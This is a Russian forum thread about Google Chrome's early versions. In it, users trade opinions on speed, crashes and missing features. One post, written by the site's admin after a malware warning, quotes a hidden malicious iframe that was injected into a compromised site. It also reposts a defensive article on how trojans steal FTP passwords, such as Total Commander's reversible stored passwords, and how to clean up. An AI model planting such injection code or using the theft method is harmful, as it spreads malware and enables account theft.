Google Chrome Beta
Гугл сделал новый браузер, "убийцу" ослика и лисы. Лично я не слишком верю что он убьёт лису, но он оригинален свой простотой и скоростью. Можете скачать попробывать.
Полная версия этой страницы: Google Chrome
Все гениальное просто. Это про этот браузер.
не, ну он правда интересный
не, ну он правда интересный
Браузер, в котором за первую неделю работы нашли две критических дырки, не может считаться безопасным
Это ж бета, как-никак
Ну если они его толково доделают, то получится простой и удобный браузер.
Все раяно я люблю осла, ток он чисто по мелкософстки грузя страницу загружает 4х ядерный проц на 40- 60% !!!!!
А вам слабо?
А вам слабо?
У меня Хром уже месяц стоит. Всё отлично идёт, без проблем. Больше он мне нравится, чем Опера и Лисичка.
По причине того, что лиса у меня жрет 200-300 метров памяти, пришлось перейти на хром. Ну, в голом виде, он, конечно, грузит всего 30 метров. Посмотрим, что будет через пару месяцев.
Пока нет поддержки расширений, это обычное (ну ладно, не совсем обычное) неудобное говно. С каждым разом всё лучше, но всё равно плохо.
ИМХО, разумеется.
ИМХО, разумеется.
Цитата
По причине того, что лиса у меня жрет 200-300 метров памяти, пришлось перейти на хром
и че? у меня ща например не запушено ничего существенного, и все это вместе с осью ест 1,25 гига, не переходить же на Линукс %)
Цитата
Пока нет поддержки расширений, это обычное (ну ладно, не совсем обычное) неудобное говно. С каждым разом всё лучше, но всё равно плохо.
Что, привык к фенечкам? :)
Фиар, я не против 200-300 метров, просто она вдобавок загружает мне процессор под верхушку.
Цитата
Фиар, я не против 200-300 метров, просто она вдобавок загружает мне процессор под верхушку.
прем в ИЕ получается, он до 50% грузит 4х ядерник )))
Цитата
прем в ИЕ получается, он до 50% грузит 4х ядерник )))
о_О хренасе.
Бэйн, делаем вывод: Гейтса на бочку с порохом - пущай полетает!
Цитата(Праздный @ 14.2.2009, 14:57) 
Что, привык к фенечкам? :)
Привык. Хочется "лениво браузить мышкой ©", смотреть температуру "на месте", скринить полные страницы парой кликов, человеческий (или близкий к нему) download manager... да мало ли? А в этом вашем хроме даже с элементарным скроллингом по средней кнопке мыши тянули до второй версии, которая сейчас ещё является бетой и обновлением "единички" не считается — и это при том, что, во-первых, в хромиуме эта возможность есть уже лет сто, а во-вторых, даже её реализовали наполовину (не буду вдаваться в подробности, кому интересно — просто сравните с тем же ФФ).
Отдельно хочется вспомнить кретина, решившего, что кнопке остановки загрузки страницы самое место подальше от прочих основных — аж по ту сторону поля адреса.
И это не говоря уже о постоянно глючащем JavaScript (хотя в "двойке", кажется, с этим делом стало получше, да), спартанскому набору настроек, среди которых при этом не нужна и половина.
Откровенно убогая система поиска — почему я в ФФ должен для смены системы всего лишь выбрать её в менюшке, доступной по одному клику, а в хроме нужно лезть в настройки или париться с ключевыми словами? Зато ох вау — в хроме я могу искать прямо из адресной строки. Как будто в ФФ этого делать было нельзя.
Последний дурацкий вопрос: где в хроме можно отключить отображение картинок? Вот просто так. Совсем. Да, ФФ проигрывает Опере, в которой это можно сделать одним кликом, но здесь-то — где?
Такие дела, товарищи. Простите, не сдержался.
Дык Гугл всегда медленно запрягает, да быстро едет, хотя за популярностью Лисы он, конечно, навряд ли угонится
У меня этот мелкий уродец постоянно падает с сообщением:
Если бы не его быстроходность, давно бы плюнул и пользовался сафари.
ППКС.
По-моему, отключить можно только, если кто-то напишет скрипт.
Цитата
Какая досада! Произошел сбой Google Chrome. Перезапустить браузер?
Если бы не его быстроходность, давно бы плюнул и пользовался сафари.
Цитата
И это не говоря уже о постоянно глючащем JavaScript (хотя в "двойке", кажется, с этим делом стало получше, да), спартанскому набору настроек, среди которых при этом не нужна и половина.
ППКС.
Цитата
Последний дурацкий вопрос: где в хроме можно отключить отображение картинок? Вот просто так. Совсем. Да, ФФ проигрывает Опере, в которой это можно сделать одним кликом, но здесь-то — где?
По-моему, отключить можно только, если кто-то напишет скрипт.
[quote]У меня этот мелкий уродец постоянно падает с сообщением:quote]
у меня где то 4 месяца подрят ИЕ при серфинге по нашему порталу выбивало, ятак и не понял толи браузер глючил толе на форуме у нас что то было не то )
у меня где то 4 месяца подрят ИЕ при серфинге по нашему порталу выбивало, ятак и не понял толи браузер глючил толе на форуме у нас что то было не то )
Поставила себе этот браузер, очень уж он прост. Мне совсем непривычно после лисы, что нет кнопки нажав на которую можно сразу перейти на дом. страницу, хотя если доделают, то может быть и выйдет что-нибудь толковое.
Цитата
Мне совсем непривычно после лисы, что нет кнопки нажав на которую можно сразу перейти на дом. страницу
Или речь о чём-то другом?
Все равно лисой еще много пользуется,и лиса еще долго будет жить на наших компах...
Цитата(ZavroN @ 22.3.2009, 15:23)
"Основные" и "базовые". Хм... в чем же разница? хД
Основные касаются браузера, базовые — работы с содержанием страниц. Хотя с названиями забавно, да.
Я думаю это тонкости перевода )
Цитата(ZavroN @ 22.3.2009, 19:23)
Или речь о чём-то другом?
Спасибо, просто не сразу обратила на это внимание, на Лисе эта кнопочка сразу при установке встаёт.
Поставил давно уже но как-то... жду короче достойных обновлений!
Что бы прикольно было использовать разные гуглфишки!
Что бы прикольно было использовать разные гуглфишки!
Не знаю, кажется мне или нет, но после того, как гугл автоматически обновился, он стал ужасен.
Новые фичи вообще ни о чём (их и нет практически), зато браузер видимо стал весить столько, что при загрузке страниц музыка и видео-файлы стали заедать.
Чертовски обидно. Я пока на опере и всё в порядке.
Новые фичи вообще ни о чём (их и нет практически), зато браузер видимо стал весить столько, что при загрузке страниц музыка и видео-файлы стали заедать.
Чертовски обидно. Я пока на опере и всё в порядке.
Браузер замечательный. Когда в один прекрасный момент мне надоело чистить куки и сохраненные пароли в фаерфоксе, а реинсталить стало жалко - поставил гуглохром.
Собственно, минусы:
1) Нет возможности просмотреть свойства эллемента.
2) Нет возможности просмотреть выделенный код. Вернее, возможность есть, но скопипастить его оттуда нельзя - только в просмотре кода всей страницы =)
3) Глючит поддержка сертификатов безопасности - для работы с вэбмани приходится держать другой браузер.
4) Что-то неясное с попапами. Походу гугл толи не понимает их, толи считает ВСЕ попапы ненужными. Для работы с хостингом джиси приходится держать другой браузер xD
5) Нет расширений. Я могу, конечно, скачать исходники Хромиума, но это не то=)
Собственно, минусы:
1) Нет возможности просмотреть свойства эллемента.
2) Нет возможности просмотреть выделенный код. Вернее, возможность есть, но скопипастить его оттуда нельзя - только в просмотре кода всей страницы =)
3) Глючит поддержка сертификатов безопасности - для работы с вэбмани приходится держать другой браузер.
4) Что-то неясное с попапами. Походу гугл толи не понимает их, толи считает ВСЕ попапы ненужными. Для работы с хостингом джиси приходится держать другой браузер xD
5) Нет расширений. Я могу, конечно, скачать исходники Хромиума, но это не то=)
Да, хром очень быстроходный и компактный, просто и со вкусом. =) Но когда я заведу свой гроб и перестану пользоваться ноутом, все равно перелезу на лису. Без расширений скучно. =)
К тому же, у меня стойкое впечатление, что с безопасностью у него дела хуже, чем у оперы или лисы. У меня вирус один раз пробрался и заблокировал комп, правда был ламерский и избавиться от него удалось, но все же неприятно.
К тому же, у меня стойкое впечатление, что с безопасностью у него дела хуже, чем у оперы или лисы. У меня вирус один раз пробрался и заблокировал комп, правда был ламерский и избавиться от него удалось, но все же неприятно.
Извиняюсь за дабл-пост, просто хром сходит с ума:
Цитата
Внимание! Посещение этого сайта может нанести вред вашему компьютеру.
Веб-сайт по адресу www.jcouncil.net содержит элементы сайта www.swspace.ru, где, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполять действия без вашего согласия. Ваш компьютер может быть заражен просто при посещении сайта, на котором размещена вредоносная программа.
Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена www.swspace.ru.
Веб-сайт по адресу www.jcouncil.net содержит элементы сайта www.swspace.ru, где, вероятно, размещено вредоносное ПО – программа, которая может нанести вред вашему компьютеру или выполять действия без вашего согласия. Ваш компьютер может быть заражен просто при посещении сайта, на котором размещена вредоносная программа.
Более подробную информацию о неполадках с этими элементами можно найти на странице Google Страница диагностики безопасного просмотра для домена www.swspace.ru.
Я уже написал Артему, чтоб пофиксил баги на свспейсе. Если не пройдет - уберу баннер свспейса.
Благодаря своевременному сигналу (спасибо Лосту) все под контролем.
Один из сайтов который хостится на свспейсе был взломан. Этот сайт не имел собственного домена второго уровня и был на домене 3его уровня. имя_сайта.swspace.ru Сам сайт не указывается по этическим соображениям. А гугл что бы перестраховаться предупреждает обовсем где есть слово "swspace". Все кто ходили на джей си, на www.swspace.ru и другие сайты на хостинге свспейса могут не волноваться, никто не открывал зараженную страничку. Этот зараженный сайт новый и еще не участвует в рейтинге свспейса, так что 99% что вы его не посещали.
Вредоностная ссылка выглядела вот так:
Я на сегодняшний день все чаще и чаще встречаю случаи зарашения такого рода вирусами. Начиная от того что мне в одноклассниках и вконтакте частенько приходит предложения послать СМС на короткий номер, странные коды на сайте как iframe так и <script>document.write(unescape( вплодь до кражи паролей не только от ФТП, почты, но и к Webmoney.
Все это это один и тот же тип взлома. А вина в том что люди не хотят ставить 3ий сервис пак на Экспу, не ставят апдейты (а ведь все происходит через дыры в винде) и антивирусы.
Кому интересно, как же попал на тот сайт вирус?
iframe или "у меня на сайте вирусы!"
в последнее время участились случаи обращения в службу поддержки по данному вопросу. Пользователь, заходя на свой сайт обнаруживает:
1. изменённый код своей страницы (где чаще всего присутствует код <iframe> )
2. Антивирус ругается на наличие вируса на данной странице
3. не обнаруживает ничего, ничего хорошего для себя (иногда индексный файл нулевой длины, либо некорректно добавлен код в php файл и на экране высвечивается ошибка интрепретатора)
Кратко раскроем механизм того, как это происходит.
На большинство используемых уязвимостей Microsoft (а в большинстве случаев используются уязвимости именно в продуктах этого производителя ПО) уже давно выпустил заплатки
например* ,
http://www.viruslist.com/ru/viruses/encycl...a?virusid=78107
Код:
Exploit.HTML.Iframe.FileDownload
исправление выпущено компанией Microsoft 29 марта 2001 г.
*заплатка на данную уязвимость приведена как пример, полный список уязвимостей и заплаток ищите на сайте http://www.microsoft.com
Но не все пользователи заботятся об установке подобных исправлений.
Получая заражённое таким образом письмо или посещая сайт с таким эксплоитом Вы, сами того не ведая, загружаете на свой компьютер (и запускается он автоматически) другой вирус, чаще всего троян, который ворует Ваши пароли.
например такой
http://www.viruslist.com/ru/viruses/encycl...?virusid=147349
пароли на кошельки webmoney, Яндекс-деньги, ftp аккаунты Ваших сайтов и так далее оказываются вруках злоумышленника и в один прекрасный день Вы видите на своём сайте очередной код затрояненой странички (добавляется к вашей станичке пара строчек), а у себя в кошельке видите одни нули. Вычислить интернет-преступников очень тяжело, если сказать точнее, то практически невозможно. И если восстановить сайт достаточно просто из backup, то денег на электронных счетах Вам, практически, больше не увидеть.
http://mastertalk.ru/topic25547.html
http://forum.drweb.com/viewtopic.php?t=4406
продолжение следует....
[update 21 мая 2007]
некоторые вирусы используют запуск скрипта на Вашей странице, например таким способом:
Код:
<script>document.write(unescape(
ЧТО ДЕЛАТЬ?
1. прежде всего вычистить свой компьютер от различной "заразы", например, установив антивирус со свежими обновлениями. в критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой степени, что лечению это не поддаётся.
2. поставить ВСЕ ЗАПЛАТКИ (сервис-паки) на свою операционную систему, убирающие уязвимости windoцs известные компании microsoft до текущего времени.
3. сменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах. пароли, полученные для доступа к нашим услугам, можете по этим инструкциям
http://forum.ruweb.net/viewthread.php?tid=1829
4. кардинальный способ: заблокировать ftp доступ к сайту. пример для тех серверов, где proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
создайте, например, файловым менеджером директадмина
http://site-helper.ru/uploading.html#filemanager
файл .ftpaccess
с таким содержанием
Цитата:
<Limit>
DenyAll
</Limit>
если же есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете разрешить доступ с некоторго диапазона адресов, например так
Цитата:
<Limit>
Allow 192.168.0.1/32
DenyAll
</Limit>
Как Не Заразиться И Как Правильно Лечиться
* материал взят из поста ЗАРАЗА на локальном форуме sanet.nnov.ru 25.10.2007
Сейчас поколения троянских программ меняются по несколько раз в сутки, причем некоторых - автоматически при выходе обновленных баз к популярным антивирусам. Поэтому наличие антивируса, даже регулярно обновляемого, снижает риск, но совсем не гарантирует безопасности. Желательно, соблюдать элементарные меры гигиены. А именно:
1. Иметь в системе несколько учетных записей. Для работы с Интернет и закачки подозрительного содержимого держать отдельную учетную запись без прав администратора. Мера по надежности лучше любого антивируса.
2. Загружать исполняемый файлы только из известных и проверенных источников. Если качается какая-то новая программа - найти через Google официальный сайт и скачать оттуда. Ни в коем разе не с торрентов, тем более внешних, даже если это свежая игрушка. Если по другому ну совсем никак - закачать, подождать пару дней, проверить свежим антивирусом. Тоже касается кряков к программам.
3. Лучше использовать альтернативный браузер, Mozilla или Opera. Особенно любителям porno, warez, кряков и иже с ним. Ошибок в них не меньше, но ломают их реже.
4. Обновлять антивирус перед каждым выходом в интернет и не реже чем раз в 3 часа при активном браузинге. Лучше чаще.
5. Использовать какие-либо альтернативы антивирусам. Например http://www.gentlesecurity.com/ - достаточно надежный способ защиты.
Если все-таки заразились, то лечиться следующим образом. Антивирусом с самыми последними базами (причем иметь ввиду, что Dr.Web, AVG, NOD32, McAfee работают очень неоперативно, даже если выпускают обновления часто. Kaspersky, Symantec выпускает обновления достаточно шустро. Panda - сносно). Убедиться, что боновление баз прошло успешно. Лучше скачать пару антивирусов, хотя бы триальных версий того же Касперского.
1. Перегрузиться в безопасный режим. Найти/удалить троянцев.
2. Перегрузиться в обычный режим. Подождать немного.
3. Перегрузиться опять в безопасный режим. Если троянцы опять есть - oops. Если не умеем чистить вручную, то форматируем диск.
4. Достаточно свежая утилитка, можно потестировать:
http://www.online-solutions.ru/osam_autorun.php
5. Для очень продвинутых пользователей - AVZ ( http://www.z-oleg.com/secur/avz/ ). Обязательно включать AVZGuard.
6. По окончании лечения проверить c:\windows\system32\drivers\etc\hosts - удалить лишние записи.
update от 04.06.2009
очень часто от клиентов, когда даём данный материал к ознакомлению, слышим примерно следующее:
Цитата:
быть такого не может, у меня стоит на компьютере антивирус и никаких троянов он не обнаруживает.
А каким собственно образом злоумышленник (троянская программа) вытащила у меня логин/пароль? Первый раз слышу чтобы трояны были наделены искусственным интеллектом. Ftp клиентов у меня не стоит. Трояны научились читать и анализировать тексты?
И то что на Вашем компьютере не обнаружено троянов ещё не значит что их у Вас нет. Трояны в базу антивируса каким-то образом должны попасть.
О том как воруют пароли к FTP
дополнение к статье iframe или "у меня на сайте вирусы!"
© Тимур Маркидонов
Многие FTP-клиенты позволяют сохранять пароли к FTP-аккаунтам. С одной стороны это удобство, а с другой - потенциальная опасность. Давайте рассмотрим это на примере FTP-клиента, встроенного в популярный файловый менеджер Total Commander.
Устанавливаем самую последнюю на данный момент версию - 7.04a (от 08.08.2008), создаем подключение к хосту example.com, логин делаем user, а пароль - abrakadabra. Подключение создано. А теперь, собственно, вопрос - а куда Total Commander сохранил наш пароль?
После недолгих поисков обнаруживаем, что программа создала файл C:\WINDOWS\wcx_ftp.ini со следующим содержимым:
[connections]
default=example.com
1=example.com
[default]
pasvmode=0
[example.com]
host=example.com
username=user
password=C9A7435D1752E07C2E9D4E2F48FADB
pasvmode=0
Несложно догадаться, что C9A7435D1752E07C2E9D4E2F48FADB - это и есть наш пароль abrakadabra, только в зашифрованном виде. Причем шифрование является обратимым, т.к. Total Commander для успешного подключения должен по какому-то известному ему алгоритму однозначно расшифровать его как abrakadabra.
Теперь рассмотрим, как всем этим может воспользоваться злоумышленник. Ему всего лишь необходимо написать небольшую программу, которая при попадании на компьютер жертвы перешлет ему файл C:\WINDOWS\wcx_ftp.ini. В результате он получит список хостов к которым подключалась жертва, а также логины и зашифрованные пароли к ним.
Останется только расшифровать пароли. А за этим даже далеко ходить не надо. Ввеедм в Google запрос "total commander ftp crack", и первые же ссылки приведут нас на фанатские сайты Total Commander, где среди статей и плагинов можно найти утилиту "Windows Commander FTP crack", описываемую как "удобное средство восстановления забытых FTP-паролей в Total Commaner". Несмотря на то что написана она еще в 2003-м (!) году, она до сих пор работает. В одно окошко вводим C9A7435D1752E07C2E9D4E2F48FADB, а в другом успешно получаем наш реальный пароль abrakadabra.
Таким образом, чтобы безопасно хранить FTP-пароли в Total Commander (да и вообще любые пароли в любых программах, например пароль к почтовому ящику в браузере Opera - принцип сохранения паролей в большинстве случаев схож с описанным выше), необходимо на 100% быть уверенным, что ваш компьюер надежно защищен. Иначе в один прекрасный день вы можете обнаружить на своем сайте сторонний код, который будет пытаться загрузить вирус на компьютеры всех ваших посетителей.
Один из сайтов который хостится на свспейсе был взломан. Этот сайт не имел собственного домена второго уровня и был на домене 3его уровня. имя_сайта.swspace.ru Сам сайт не указывается по этическим соображениям. А гугл что бы перестраховаться предупреждает обовсем где есть слово "swspace". Все кто ходили на джей си, на www.swspace.ru и другие сайты на хостинге свспейса могут не волноваться, никто не открывал зараженную страничку. Этот зараженный сайт новый и еще не участвует в рейтинге свспейса, так что 99% что вы его не посещали.
Вредоностная ссылка выглядела вот так:
Код
<iframe src="http://bestlitevideo.cn:8080/index.php" width=162 height=136 style="visibility: hidden"></iframe>
Я на сегодняшний день все чаще и чаще встречаю случаи зарашения такого рода вирусами. Начиная от того что мне в одноклассниках и вконтакте частенько приходит предложения послать СМС на короткий номер, странные коды на сайте как iframe так и <script>document.write(unescape( вплодь до кражи паролей не только от ФТП, почты, но и к Webmoney.
Все это это один и тот же тип взлома. А вина в том что люди не хотят ставить 3ий сервис пак на Экспу, не ставят апдейты (а ведь все происходит через дыры в винде) и антивирусы.
Кому интересно, как же попал на тот сайт вирус?
iframe или "у меня на сайте вирусы!"
в последнее время участились случаи обращения в службу поддержки по данному вопросу. Пользователь, заходя на свой сайт обнаруживает:
1. изменённый код своей страницы (где чаще всего присутствует код <iframe> )
2. Антивирус ругается на наличие вируса на данной странице
3. не обнаруживает ничего, ничего хорошего для себя (иногда индексный файл нулевой длины, либо некорректно добавлен код в php файл и на экране высвечивается ошибка интрепретатора)
Кратко раскроем механизм того, как это происходит.
На большинство используемых уязвимостей Microsoft (а в большинстве случаев используются уязвимости именно в продуктах этого производителя ПО) уже давно выпустил заплатки
например* ,
http://www.viruslist.com/ru/viruses/encycl...a?virusid=78107
Код:
Exploit.HTML.Iframe.FileDownload
исправление выпущено компанией Microsoft 29 марта 2001 г.
*заплатка на данную уязвимость приведена как пример, полный список уязвимостей и заплаток ищите на сайте http://www.microsoft.com
Но не все пользователи заботятся об установке подобных исправлений.
Получая заражённое таким образом письмо или посещая сайт с таким эксплоитом Вы, сами того не ведая, загружаете на свой компьютер (и запускается он автоматически) другой вирус, чаще всего троян, который ворует Ваши пароли.
например такой
http://www.viruslist.com/ru/viruses/encycl...?virusid=147349
пароли на кошельки webmoney, Яндекс-деньги, ftp аккаунты Ваших сайтов и так далее оказываются вруках злоумышленника и в один прекрасный день Вы видите на своём сайте очередной код затрояненой странички (добавляется к вашей станичке пара строчек), а у себя в кошельке видите одни нули. Вычислить интернет-преступников очень тяжело, если сказать точнее, то практически невозможно. И если восстановить сайт достаточно просто из backup, то денег на электронных счетах Вам, практически, больше не увидеть.
http://mastertalk.ru/topic25547.html
http://forum.drweb.com/viewtopic.php?t=4406
продолжение следует....
[update 21 мая 2007]
некоторые вирусы используют запуск скрипта на Вашей странице, например таким способом:
Код:
<script>document.write(unescape(
ЧТО ДЕЛАТЬ?
1. прежде всего вычистить свой компьютер от различной "заразы", например, установив антивирус со свежими обновлениями. в критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой степени, что лечению это не поддаётся.
2. поставить ВСЕ ЗАПЛАТКИ (сервис-паки) на свою операционную систему, убирающие уязвимости windoцs известные компании microsoft до текущего времени.
3. сменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах. пароли, полученные для доступа к нашим услугам, можете по этим инструкциям
http://forum.ruweb.net/viewthread.php?tid=1829
4. кардинальный способ: заблокировать ftp доступ к сайту. пример для тех серверов, где proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
создайте, например, файловым менеджером директадмина
http://site-helper.ru/uploading.html#filemanager
файл .ftpaccess
с таким содержанием
Цитата:
<Limit>
DenyAll
</Limit>
если же есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете разрешить доступ с некоторго диапазона адресов, например так
Цитата:
<Limit>
Allow 192.168.0.1/32
DenyAll
</Limit>
Как Не Заразиться И Как Правильно Лечиться
* материал взят из поста ЗАРАЗА на локальном форуме sanet.nnov.ru 25.10.2007
Сейчас поколения троянских программ меняются по несколько раз в сутки, причем некоторых - автоматически при выходе обновленных баз к популярным антивирусам. Поэтому наличие антивируса, даже регулярно обновляемого, снижает риск, но совсем не гарантирует безопасности. Желательно, соблюдать элементарные меры гигиены. А именно:
1. Иметь в системе несколько учетных записей. Для работы с Интернет и закачки подозрительного содержимого держать отдельную учетную запись без прав администратора. Мера по надежности лучше любого антивируса.
2. Загружать исполняемый файлы только из известных и проверенных источников. Если качается какая-то новая программа - найти через Google официальный сайт и скачать оттуда. Ни в коем разе не с торрентов, тем более внешних, даже если это свежая игрушка. Если по другому ну совсем никак - закачать, подождать пару дней, проверить свежим антивирусом. Тоже касается кряков к программам.
3. Лучше использовать альтернативный браузер, Mozilla или Opera. Особенно любителям porno, warez, кряков и иже с ним. Ошибок в них не меньше, но ломают их реже.
4. Обновлять антивирус перед каждым выходом в интернет и не реже чем раз в 3 часа при активном браузинге. Лучше чаще.
5. Использовать какие-либо альтернативы антивирусам. Например http://www.gentlesecurity.com/ - достаточно надежный способ защиты.
Если все-таки заразились, то лечиться следующим образом. Антивирусом с самыми последними базами (причем иметь ввиду, что Dr.Web, AVG, NOD32, McAfee работают очень неоперативно, даже если выпускают обновления часто. Kaspersky, Symantec выпускает обновления достаточно шустро. Panda - сносно). Убедиться, что боновление баз прошло успешно. Лучше скачать пару антивирусов, хотя бы триальных версий того же Касперского.
1. Перегрузиться в безопасный режим. Найти/удалить троянцев.
2. Перегрузиться в обычный режим. Подождать немного.
3. Перегрузиться опять в безопасный режим. Если троянцы опять есть - oops. Если не умеем чистить вручную, то форматируем диск.
4. Достаточно свежая утилитка, можно потестировать:
http://www.online-solutions.ru/osam_autorun.php
5. Для очень продвинутых пользователей - AVZ ( http://www.z-oleg.com/secur/avz/ ). Обязательно включать AVZGuard.
6. По окончании лечения проверить c:\windows\system32\drivers\etc\hosts - удалить лишние записи.
update от 04.06.2009
очень часто от клиентов, когда даём данный материал к ознакомлению, слышим примерно следующее:
Цитата:
быть такого не может, у меня стоит на компьютере антивирус и никаких троянов он не обнаруживает.
А каким собственно образом злоумышленник (троянская программа) вытащила у меня логин/пароль? Первый раз слышу чтобы трояны были наделены искусственным интеллектом. Ftp клиентов у меня не стоит. Трояны научились читать и анализировать тексты?
И то что на Вашем компьютере не обнаружено троянов ещё не значит что их у Вас нет. Трояны в базу антивируса каким-то образом должны попасть.
О том как воруют пароли к FTP
дополнение к статье iframe или "у меня на сайте вирусы!"
© Тимур Маркидонов
Многие FTP-клиенты позволяют сохранять пароли к FTP-аккаунтам. С одной стороны это удобство, а с другой - потенциальная опасность. Давайте рассмотрим это на примере FTP-клиента, встроенного в популярный файловый менеджер Total Commander.
Устанавливаем самую последнюю на данный момент версию - 7.04a (от 08.08.2008), создаем подключение к хосту example.com, логин делаем user, а пароль - abrakadabra. Подключение создано. А теперь, собственно, вопрос - а куда Total Commander сохранил наш пароль?
После недолгих поисков обнаруживаем, что программа создала файл C:\WINDOWS\wcx_ftp.ini со следующим содержимым:
[connections]
default=example.com
1=example.com
[default]
pasvmode=0
[example.com]
host=example.com
username=user
password=C9A7435D1752E07C2E9D4E2F48FADB
pasvmode=0
Несложно догадаться, что C9A7435D1752E07C2E9D4E2F48FADB - это и есть наш пароль abrakadabra, только в зашифрованном виде. Причем шифрование является обратимым, т.к. Total Commander для успешного подключения должен по какому-то известному ему алгоритму однозначно расшифровать его как abrakadabra.
Теперь рассмотрим, как всем этим может воспользоваться злоумышленник. Ему всего лишь необходимо написать небольшую программу, которая при попадании на компьютер жертвы перешлет ему файл C:\WINDOWS\wcx_ftp.ini. В результате он получит список хостов к которым подключалась жертва, а также логины и зашифрованные пароли к ним.
Останется только расшифровать пароли. А за этим даже далеко ходить не надо. Ввеедм в Google запрос "total commander ftp crack", и первые же ссылки приведут нас на фанатские сайты Total Commander, где среди статей и плагинов можно найти утилиту "Windows Commander FTP crack", описываемую как "удобное средство восстановления забытых FTP-паролей в Total Commaner". Несмотря на то что написана она еще в 2003-м (!) году, она до сих пор работает. В одно окошко вводим C9A7435D1752E07C2E9D4E2F48FADB, а в другом успешно получаем наш реальный пароль abrakadabra.
Таким образом, чтобы безопасно хранить FTP-пароли в Total Commander (да и вообще любые пароли в любых программах, например пароль к почтовому ящику в браузере Opera - принцип сохранения паролей в большинстве случаев схож с описанным выше), необходимо на 100% быть уверенным, что ваш компьюер надежно защищен. Иначе в один прекрасный день вы можете обнаружить на своем сайте сторонний код, который будет пытаться загрузить вирус на компьютеры всех ваших посетителей.
Это все круто, но хром продолжает ругаться. :(
Ну не все происходит моментально. Но уже все все, все недопонимания с гуглом я решил. Больше не должно.
А зачем Хром для Линукса телепортирует коз? 0_о
Google залатала дюжину "дыр" в Chrome 7
Разработчики Google выпустили порцию заплаток для браузера Chrome, обновив приложение до версии 7.0.517.44.В новой редакции веб-обозревателя специалисты компании устранили 12 уязвимостей высокой степени опасности. Программисты исправили недоработки в коде, приводившие к повреждению областей памяти обработчика страниц, устранили "дыры" в отвечающей за взаимодействие с SVG-файлами системе, ликвидировали бреши в компоненте libvpx и прочих модулях браузера. Также сообщается о включении в состав обозревателя новой версии Adobe Flash Player, в котором была закрыта критическая уязвимость, позволявшая злоумышленникам выполнить вредоносный код на удаленном компьютере при открытии пользователем специально оформленного SWF- либо PDF-файла. Во избежание проблем с безопасностью, рекомендуется обновить Chrome при первой же возможности.
Седьмая линейка Chrome была представлена 20 октября. При подготовке к выпуску обновленной версии браузера разработчики сосредоточили усилия на совершенствовании механизмов обработки сетевого контента, реализации нового алгоритма парсинга HTML5, поддержке AppleScript и интерфейса FileAPI. Среди прочих нововведений выделяются возможность манипулирования директориями при загрузке данных на удаленный сервер и появление в настройках программы опции, отвечающей за блокирование файлов cookies от определенных сайтов. Также в списке изменений фигурирует увеличенная скорость работы обозревателя.
Загрузить Chrome 7.0 можно с сайта google.com/chrome либо воспользовавшись функцией автоматического обновления уже установленного браузера. Доступны сборки для Windows, Linux и Mac OS.
Источник
Решил попробовать этот браузер.Неплохо но непривычно и не совсем удобно(дырки ещё есть)
А по мне - самый удобный браузер... Фактически, это как "колесо" среди браузеров - просто и гениально) а если хочется чего-нибудь понавороченнее - достаточно всяких расширений.
Браузер уж точно самый удобный. Из недостатков выделяю разве что проблему с "опаньки".
Цитата(Dhani @ 9.11.2010, 20:05)
Из недостатков выделяю разве что проблему с "опаньки".
Счастливый человек.
Цитата(zavron_lb @ 10.11.2010, 1:33)
Счастливый человек.
То есть?
То и есть. Я, вероятно, слишком придирчив, но вижу в хроме куда больше недостатков, хотя, признаться, вообще не понял, что за "проблема с опаньки".
Впрочем, после ФФ в моём личном топе он стоит примерно наравне с симанки, а дальше уже всё совсем плохо.
Впрочем, после ФФ в моём личном топе он стоит примерно наравне с симанки, а дальше уже всё совсем плохо.
Мой Хром сломался... 0_о
Цитата(Helios @ 12.11.2010, 9:27)
Мой Хром сломался... 0_о
Не смешно :((
Цитата
Не смешно :((
в чем дело то? а то вы все мастаки говрить что у мелкософта руки кривые xD
А фиг его знает что это было... Переустановил и все вернулось восвояси. И да, у мелкософта руки кривые xD
Цитата(Helios @ 12.11.2010, 14:45)
Не смешно :((
Кому как ))
Цитата
признаться, вообще не понял, что за "проблема с опаньки".
когда окна отрубаются и вылезает такое сообщение. приходится перезагружать. бесит(
Цитата(Dhani @ 12.11.2010, 20:48)
когда окна отрубаются и вылезает такое сообщение. приходится перезагружать. бесит(
Ах, это. В версии где-то, наверное, 6.x было часто, потом больше вообще не видел.
Ну да не суть.
Меня очень порадовал Хром для иПада, все мое сразу тут :)
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке.